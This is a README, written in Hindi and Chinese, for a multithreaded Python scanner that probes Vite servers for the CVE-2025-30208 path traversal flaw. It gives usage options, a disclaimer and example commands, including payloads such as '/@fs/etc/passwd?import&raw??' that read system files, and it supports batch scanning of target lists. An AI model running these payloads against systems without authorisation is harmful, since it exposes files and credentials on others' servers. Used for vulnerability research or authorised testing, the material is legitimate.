
CVE-2025-30208 Vite पथ ट्रैवर्सल भेद्यता के लिए मल्टी-थ्रेडेड Python स्कैनर जिसमें कस्टम पेलोड समर्थन, बैच स्कैनिंग और प्रॉक्सी डिबगिंग है।
इस लेख में वर्णित कमजोरियाँ और उनके पुनरुत्पादन के चरण केवल साइबर सुरक्षा अनुसंधान और शैक्षिक उद्देश्यों के लिए हैं। किसी को भी इस लेख में दी गई जानकारी का उपयोग अवैध उद्देश्यों या अनधिकृत सिस्टम परीक्षण के लिए नहीं करना चाहिए। लेखक इस जानकारी के उपयोग से होने वाले किसी भी प्रत्यक्ष या अप्रत्यक्ष नुकसान के लिए जिम्मेदार नहीं है।
कृपया उद्धृत करते समय स्रोत का उल्लेख करें!
https://pc.fenchuan8.com/#/index?forum=101158&yqm=DGR4X
usage: vite_check.py [-h] [-f FILE] [-u URL] [-p PAYLOAD] [--proxy PROXY] [-o OUTPUT] [-t THREADS]
Vite路径遍历漏洞检测工具 Author:iSee857
optional arguments:
-h, --help 显示帮助信息
-f FILE, --file FILE 包含目标URL的文件
-u URL, --url URL 单个目标URL
-p PAYLOAD, --payload PAYLOAD
自定义检测路径(支持两种格式):
1. 带检测标识: /path??indicator
2. 仅路径: /path?param=1??
示例:
-p "/@fs/C://windows/win.ini?import&raw??"
-p "/@fs/etc/passwd?import&raw??"
--proxy PROXY 代理服务器地址(如: http://127.0.0.1:8080)
-o OUTPUT, --output OUTPUT
输出文件名(默认: results.xlsx)
-t THREADS, --threads THREADS
并发线程数量(默认: 50,范围: 1-200)```
使用示例
1. 扫描单个目标:
python CVE-2025-30208-PoC.py -u http://example.com -t 5
2、批量扫描目标文件:
python CVE-2025-30208-PoC.py -f targets.txt -o vuln_results.xlsx
3、使用自定义payload:
python CVE-2025-30208-PoC.py -u http://example.com -p "/@fs/etc/passwd?import&raw??"
4、使用代理调试:
python CVE-2025-30208-PoC.py -u http://example.com --proxy http://127.0.0.1:8080
5、组合使用参数:
python CVE-2025-30208-PoC.py -f targets.txt -t 200 -o critical_vulns.xlsx

